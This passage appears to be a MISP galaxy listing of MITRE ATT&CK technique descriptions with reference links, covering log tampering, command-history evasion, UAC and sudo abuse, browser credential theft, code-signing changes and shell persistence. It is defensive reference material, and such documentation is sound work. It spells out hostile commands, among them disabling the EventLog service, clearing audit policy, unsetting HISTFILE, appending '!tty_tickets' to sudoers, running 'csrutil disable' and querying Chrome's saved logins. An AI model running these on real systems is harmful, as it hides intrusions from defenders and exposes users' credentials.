Network devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device. A typical example of this is environments where internal networks make use of non-Internet routable addresses.(Citation: RFC1918)

When an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design. In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device. In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders.

Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities

The tag is: misp-galaxy:mitre-attack-pattern="Network Address Translation Traversal - T1599.001"

Table 5491. Table References

Links

https://attack.mitre.org/techniques/T1599/001

https://tools.ietf.org/html/rfc1918

Disable Windows Event Logging - T1562.002

Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.

The EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to <code>Security Settings\Local Policies\Audit Policy</code> for basic audit policy settings or <code>Security Settings\Advanced Audit Policy Configuration</code> for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) <code>auditpol.exe</code> may also be used to set audit policies.(Citation: auditpol)

Adversaries may target system-wide logging or just that of a particular application. For example, the Windows EventLog service may be disabled using the <code>Set-Service -Name EventLog -Status Stopped</code> or <code>sc config eventlog start=disabled</code> commands (followed by manually stopping the service using <code>Stop-Service -Name EventLog</code>).(Citation: Disable_Win_Event_Logging)(Citation: disable_win_evt_logging) Additionally, the service may be disabled by modifying the “Start” value in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog</code> then restarting the system for the change to take effect.(Citation: disable_win_evt_logging)

There are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the "Start" value in the key <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Security</code>, then reboot the system to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) Second, with Administrator privilege, adversaries may modify the same values in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System</code> and <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Application</code> to disable the entire EventLog.(Citation: disable_win_evt_logging)

Additionally, adversaries may use <code>auditpol</code> and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the <code>/success</code> or <code>/failure</code> parameters. For example, <code>auditpol /set /category:”Account Logon” /success:disable /failure:disable</code> turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: <code>auditpol /clear /y</code> or <code>auditpol /remove /allusers</code>.(Citation: T1562.002_redcanaryco)

By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.

The tag is: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002"

Table 5492. Table References

Links

https://attack.mitre.org/techniques/T1562/002

https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-defenses/disable-windows-event-logging

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings

https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/audit-policy

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md

https://ptylu.github.io/content/report/report.html?report=25

https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html

https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c

https://web.archive.org/web/20211107115646/https://twitter.com/klinix5/status/1457316029114327040

https://www.coretechnologies.com/blog/windows-services/eventlog/

https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/

Impair Command History Logging - T1562.003

Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they’ve done.

On Linux and macOS, command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user’s home directory called <code>~/.bash_history</code>. The <code>HISTCONTROL</code> environment variable keeps track of what should be saved by the <code>history</code> command and eventually into the <code>~/.bash_history</code> file when a user logs out. <code>HISTCONTROL</code> does not exist by default on macOS, but can be set by the user and will be respected.

Adversaries may clear the history environment variable (<code>unset HISTFILE</code>) or set the command history size to zero (<code>export HISTFILESIZE=0</code>) to prevent logging of commands. Additionally, <code>HISTCONTROL</code> can be configured to ignore commands that start with a space by simply setting it to "ignorespace". <code>HISTCONTROL</code> can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.

On Windows systems, the <code>PSReadLine</code> module tracks commands used in all PowerShell sessions and writes them to a file (<code>$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</code> by default). Adversaries may change where these logs are saved using <code>Set-PSReadLineOption -HistorySavePath {File Path}</code>. This will cause <code>ConsoleHost_history.txt</code> to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command <code>Set-PSReadlineOption -HistorySaveStyle SaveNothing</code>.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)

Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. <code>no logging</code>).

The tag is: misp-galaxy:mitre-attack-pattern="Impair Command History Logging - T1562.003"

Table 5493. Table References

Links

https://attack.mitre.org/techniques/T1562/003

https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit

https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7

Disable or Modify Tools - T1629.003

Adversaries may disable security tools to avoid potential detection of their tools and activities. This can take the form of disabling security software, modifying SELinux configuration, or other methods to interfere with security tools scanning or reporting information. This is typically done by abusing device administrator permissions or using system exploits to gain root access to the device to modify protected system files.

The tag is: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1629.003"

Table 5494. Table References

Links

https://attack.mitre.org/techniques/T1629/003

Bypass User Account Control - T1548.002

Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)

If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)

Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:

  • <code>eventvwr.exe</code> can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)

Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)

The tag is: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002"

Table 5496. Table References

Links

http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass

http://www.pretentiousname.com/misc/win7_uac_whitelist2.html

https://attack.mitre.org/techniques/T1548/002

https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware

https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/

https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/

https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/

https://github.com/hfiref0x/UACME

https://msdn.microsoft.com/en-us/library/ms679687.aspx

https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx

https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works

User Activity Based Checks - T1497.002

Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)

Adversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks (Citation: Sans Virtual Jan 2016) , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to double click on an embedded image to activate.(Citation: FireEye FIN7 April 2017)

The tag is: misp-galaxy:mitre-attack-pattern="User Activity Based Checks - T1497.002"

Table 5497. Table References

Links

https://attack.mitre.org/techniques/T1497/002

https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc

https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/

https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html

https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667

Cloud Instance Metadata API - T1552.005

Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.

Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)

If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, adversaries may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows them to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)

The de facto standard across cloud service providers is to host the Instance Metadata API at <code>http[:]//169.254.169.254</code>.

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Instance Metadata API - T1552.005"

Table 5498. Table References

Links

https://attack.mitre.org/techniques/T1552/005

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html

https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/

https://redlock.io/blog/instance-metadata-api-a-modern-day-trojan-horse

Exfiltration to Cloud Storage - T1567.002

Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.

Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002"

Table 5499. Table References

Links

https://attack.mitre.org/techniques/T1567/002

Compromise Software Supply Chain - T1474.003

Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Software Supply Chain - T1474.003"

Table 5500. Table References

Links

https://attack.mitre.org/techniques/T1474/003

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-11.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-12.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-18.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-20.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-4.html

Sudo and Sudo Caching - T1548.003

Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.

Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The <code>sudo</code> command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a <code>timestamp_timeout</code>, which is the amount of time in minutes between instances of <code>sudo</code> before it will re-prompt for a password. This is because <code>sudo</code> has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at <code>/var/db/sudo</code> with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a <code>tty_tickets</code> variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).

The sudoers file, <code>/etc/sudoers</code>, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like <code>user1 ALL=(ALL) NOPASSWD: ALL</code>.(Citation: OSX.Dok Malware) Elevated privileges are required to edit this file though.

Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user’s password. For example, <code>/var/db/sudo</code>'s timestamp can be monitored to see if it falls within the <code>timestamp_timeout</code> range. If it does, then malware can execute sudo commands without needing to supply the user’s password. Additional, if <code>tty_tickets</code> is disabled, adversaries can do this from any tty for that user.

In the wild, malware has disabled <code>tty_tickets</code> to potentially make scripting easier by issuing <code>echo \'Defaults !tty_tickets\' >> /etc/sudoers</code>.(Citation: cybereason osx proton) In order for this change to be reflected, the malware also issued <code>killall Terminal</code>. As of macOS Sierra, the sudoers file has <code>tty_tickets</code> enabled by default.

The tag is: misp-galaxy:mitre-attack-pattern="Sudo and Sudo Caching - T1548.003"

Table 5501. Table References

Links

https://attack.mitre.org/techniques/T1548/003

https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/

https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does

https://www.sudo.ws/

Credentials from Web Browsers - T1555.003

Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.

For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, <code>AppData\Local\Google\Chrome\User Data\Default\Login Data</code> and executing a SQL query: <code>SELECT action_url, username_value, password_value FROM logins;</code>. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function <code>CryptUnprotectData</code>, which uses the victim’s cached logon credentials as the decryption key.(Citation: Microsoft CryptUnprotectData April 2018)

Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).

Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)

After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary’s objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).

The tag is: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003"

Table 5502. Table References

Links

https://attack.mitre.org/techniques/T1555/003

https://blog.talosintelligence.com/2018/02/olympic-destroyer.html

https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata

https://github.com/putterpanda/mimikittenz

https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html

https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign

Code Signing Policy Modification - T1553.006

Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system.

Some of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)

Adversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include <code>bcdedit.exe -set TESTSIGNING ON</code> on Windows and <code>csrutil disable</code> on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)

To gain access to kernel memory to modify variables related to signature checks, such as modifying <code>g_CiOptions</code> to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)

The tag is: misp-galaxy:mitre-attack-pattern="Code Signing Policy Modification - T1553.006"

Table 5503. Table References

Links

https://attack.mitre.org/techniques/T1553/006

https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf

https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection

https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN

https://docs.microsoft.com/en-us/windows-hardware/drivers/install/installing-an-unsigned-driver-during-development-and-test

https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option

https://github.com/hfiref0x/TDL

https://unit42.paloaltonetworks.com/acidbox-rare-malware/

https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html

Unix Shell Configuration Modification - T1546.004

Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (<code>/etc</code>) and the user’s home directory (<code>~/</code>) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.

Adversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the <code>/etc/profile</code> and <code>/etc/profile.d</code> files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into <code>~/.bash_profile</code>, <code>~/.bash_login</code>, or <code>~/.profile</code> which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used <code>~/.bash_profile</code> to ensure execution. Adversaries have also leveraged the <code>~/.bashrc</code> file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the <code>~/.bash_logout</code> file to execute malicious commands at the end of a session.

For macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using <code>/etc/profile</code>, <code>/etc/zshenv</code>, <code>/etc/zprofile</code>, and <code>/etc/zlogin</code>.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh)(Citation: macOS MS office sandbox escape) The login shell then configures the user environment with <code>~/.zprofile</code> and <code>~/.zlogin</code>. The interactive shell uses the <code>~/.zshrc</code> to configure the user environment. Upon exiting, <code>/etc/zlogout</code> and <code>~/.zlogout</code> are executed. For legacy programs, macOS executes <code>/etc/bashrc</code> on startup.

The tag is: misp-galaxy:mitre-attack-pattern="Unix Shell Configuration Modification - T1546.004"

Table 5504. Table References

Links

https://attack.mitre.org/techniques/T1546/004

https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/

https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html

https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a

https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js

https://objective-see.com/blog/blog_0x48.html

https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5

https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/

https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/

https://wiki.archlinux.org/index.php/Bash#Invocation

https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect

https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat

https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/

Elevated Execution with Prompt - T1548.004

Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code> API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified.

Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.

Adversaries may abuse <code>AuthorizationExecuteWithPrivileges</code> to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it’s all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it’s all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it’s all broken!)

The tag is: misp-galaxy:mitre-attack-pattern="Elevated Execution with Prompt - T1548.004"

Table 5505. Table References

Links

https://attack.mitre.org/techniques/T1548/004

https://blogs.vmware.com/security/2020/02/vmware-carbon-black-tau-threat-analysis-shlayer-macos.html

https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg

https://objective-see.com/blog/blog_0x2A.html

https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8

Application or System Exploitation - T1499.004

Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent denial of service (DoS) condition.

Adversaries may exploit known or zero-day vulnerabilities to crash applications and/or systems, which may also lead to dependent applications and/or systems to be in a DoS condition. Crashed or restarted applications or systems may also have other effects such as [Data Destruction](https://attack.mitre.org/techniques/T1485), [Firmware Corruption](https://attack.mitre.org/techniques/T1495), [Service Stop](https://attack.mitre.org/techniques/T1489) etc. which may further cause a DoS condition and deny availability to critical information, applications and/or systems.

The tag is: misp-galaxy:mitre-attack-pattern="Application or System Exploitation - T1499.004"

Table 5506. Table References

Links

https://attack.mitre.org/techniques/T1499/004

https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html

Temporary Elevated Cloud Access - T1548.005

Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own.

Just-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.(Citation: Google Cloud Just in Time Access 2023)(Citation: Azure Just in Time Access 2023)

Account impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the iam.serviceAccountTokenCreator role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account.(Citation: Google Cloud Service Account Authentication Roles) In Exchange Online, the ApplicationImpersonation role allows a service account to use the permissions associated with specified user accounts.(Citation: Microsoft Impersonation and EWS in Exchange)

Many cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role’s access — for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the PassRole permission can allow a service they create to assume a given role, while in GCP, users with the iam.serviceAccountUser role can attach a service account to a resource.(Citation: AWS PassRole)(Citation: Google Cloud Service Account Authentication Roles)

While users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.(Citation: Rhino Google Cloud Privilege Escalation)(Citation: Rhino Security Labs AWS Privilege Escalation)

Note: this technique is distinct from [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003), which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.(Citation: CrowdStrike StellarParticle January 2022)

The tag is: misp-galaxy:mitre-attack-pattern="Temporary Elevated Cloud Access - T1548.005"

Table 5507. Table References

Links

https://attack.mitre.org/techniques/T1548/005

https://cloud.google.com/architecture/manage-just-in-time-privileged-access-to-project

https://cloud.google.com/iam/docs/service-account-permissions

https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_passrole.html

https://learn.microsoft.com/en-us/azure/azure-resource-manager/managed-applications/approve-just-in-time-access

https://learn.microsoft.com/en-us/exchange/client-developer/exchange-web-services/impersonation-and-ews-in-exchange

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/

https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/

Kernel Modules and Extensions - T1547.006

Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)

When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)

